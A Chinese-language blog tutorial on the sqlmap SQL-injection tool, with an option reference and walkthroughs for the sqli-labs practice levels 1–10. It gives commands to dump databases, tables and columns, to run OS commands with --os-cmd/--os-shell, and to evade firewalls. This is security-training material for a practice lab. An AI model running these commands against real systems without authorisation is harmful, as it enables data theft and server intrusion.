sqlmap使用教程（sqli-labs1-10详解）

-u 指定目标URL (可以是http协议也可以是https协议)

-d 连接数据库

--dbs 列出所有的数据库

--current-db 列出当前数据库

--tables 列出当前的表

--columns 列出当前的列

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--dump 获取字段中的数据

--batch 自动选择yes

--smart 启发式快速判断，节约浪费时间

--forms 尝试使用post注入

-r 加载文件中的HTTP请求（本地保存的请求包txt文件）

-l 加载文件中的HTTP请求（本地保存的请求包日志文件）

-g 自动获取Google搜索的前一百个结果，对有GET参数的URL测试

-o 开启所有默认性能优化

--tamper 调用脚本进行注入

-v 指定sqlmap的回显等级

--delay 设置多久访问一次

--os-shell 获取主机shell，一般不太好用，因为没权限

-m 批量操作

-c 指定配置文件，会按照该配置文件执行动作

-data data指定的数据会当做post数据提交

-timeout 设定超时时间

-level 设置注入探测等级

--risk 风险等级

--identify-waf 检测防火墙类型

--param-del="分割符" 设置参数的分割符

--skip-urlencode 不进行url编码

--keep-alive 设置持久连接，加快探测速度

--null-connection 检索没有body响应的内容，多用于盲注

--thread 最大为10 设置多线程

--delay

有些web服务器请求访问太过频繁可能会被防火墙拦截，使用--delay就可以设定两次http请求的延时

--safe-url

有的web服务器会在多次错误的访问请求后屏蔽所有请求，使用--safe-url 就可以每隔一段时间去访问一个正常的页面。

--tamper

语法：--tamper ["脚本名称"]

当调用多个脚本的时候，脚本之间用逗号隔开，调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

脚本信息

-v ["x"]

使用sqlmap注入测试时，可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:

--level

level有5个等级，默认等级为1，进行Cookie测试时使用--level 2 ，进行use-agent或refer测试时使用--level 3 ，进行 host 测试时使用--level 5

–-os-cmd=["命令"] 或 --os-shell=["命令"] 执行系统命令

利用sql-labs-less1测试 whoami 命令

sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --os-cmd=whoami

选择web服务器支持的语言

选择web服务器的可写目录

[1] 使用默认的

[2] 自定义位置

[3] 自定义目录列表文件

[4] 暴力搜索

我在本地测试，节省时间，我选择2 ，自定义路径，然后把路径输入在下面

执行命令后的返回结果

以下关卡均可用get型的方法，常规注入

sql注入检测

get型：

语法：sqlmap -u ["url"]

post型：

先使用bp把提交的数据包保存下来

或者直接

加上post提交的参数

语法：sqlmap -r ["请求包的txt文件"]

sql-labs -less1~sql-labs-less9

获取当前数据库名称：

语法：sqlmap -u [“url”] --current-db

获取指定数据库的表名：

语法：sqlmap -u [“url”] -D [‘数据库名’] --tables

获取指定数据库指定表中的字段：

语法：sqlmap -u [“url”] -D [‘数据库名’] -T[‘表名’] --columns

获取指定数据库指定表的指定字段的字段内容：

语法：sqlmap -u [“url”] -D [‘数据库名’] -T [‘表名’] -C [‘字段名1,字段名2,…’] --dump

sql-labs-less10

提升等级 -level 2

sqlmap使用教程（sqli-labs1-10详解）相关推荐

Nmap扫描教程之基础扫描详解
Nmap扫描教程之基础扫描详解 Nmap扫描基础扫描当用户对Nmap工具了解后,即可使用该工具实施扫描.通过上一章的介绍,用户可知Nmap工具可以分别对主机.端口.版本.操作系统等实施扫描.但是,在 ...
python动态类型的坑_python进阶教程之动态类型详解
动态类型(dynamic typing)是Python另一个重要的核心概念.我们之前说过,Python的变量(variable)不需要声明,而在赋值时,变量可以重新赋值为任意值.这些都与动态类型的概念 ...
get方法报空指针_C++基础教程之指针拷贝详解
C++基础教程之指针拷贝详解指针是编程人员的梦魇,对C语言的开发者是如此,对C++的开发者也是如此.特别是在C++中,如果不注意处理类中的指针,非常容易出问题.如果朋友们不相信可以看看下面的代码: ...
【STM32】标准库与HAL库对照学习教程八--串口通信详解
[STM32]标准库与HAL库对照学习教程八--串口通信详解一.前言二.准备工作三.通信的基本概念 1.通信方式 2.串行通信与并行通信 (1)串行通信 (2)并行通信 3.异步通信与同步通信 ...
我的世界服务器不显示计分板,我的世界计分板教程计分板指令详解
<我的世界计分板教程计分板指令详解>由会员分享,可在线阅读,更多相关<我的世界计分板教程计分板指令详解(9页珍藏版)>请在人人文库网上搜索. 1.我的世界计分板教程计分板 ...
AndroidManifest.xml文件配置教程及相关指令详解
AndroidManifest.xml 是每个android程序中必须的文件,它位于整个项目的根目录.我们每天都在使用这个文件,往里面配置程序运行所必要的组件,权限,以及一些相关信息.但是对于这个文件 ...
我的世界java版记分板_我的世界计分板教程计分板指令详解
我的世界计分板教程计分板指令详解.啊下面就给大家详细的介绍一下我的世界中的计分板吧!计分板的指令主要是objectives.players.teams.那下面就将这三个指令教程详细的分享一下吧!希望 ...
javascript教程：console.log 详解
对应WEB程序员,console.log 可以说是神器,极大地方便了程序开发.程序猿:学习了,用Console写日志比alert方便多了. console.log(object[, object, . ...
视频教程-wordpress建站教程之环境部署详解课程-PHP
wordpress建站教程之环境部署详解课程著名的photoshop狂热者,讲课深入浅出,生动风趣.参与编写多部photoshop视频教程,数码照片处理教程等,麒麟设计教程网特聘主讲人. 梁田聪 ¥ ...
eval 函数 java_[Java教程]eval()函数用法详解
[Java教程]eval()函数用法详解 0 2015-12-14 11:00:26 eval()函数用法详解: 此函数可能使用的频率并不是太高,但是在某些情况下具有很大的作用,下面就介绍一下eval ...

sqlmap使用教程（sqli-labs1-10详解）

sqlmap使用教程（sqli-labs1-10详解）相关推荐

最新文章

热门文章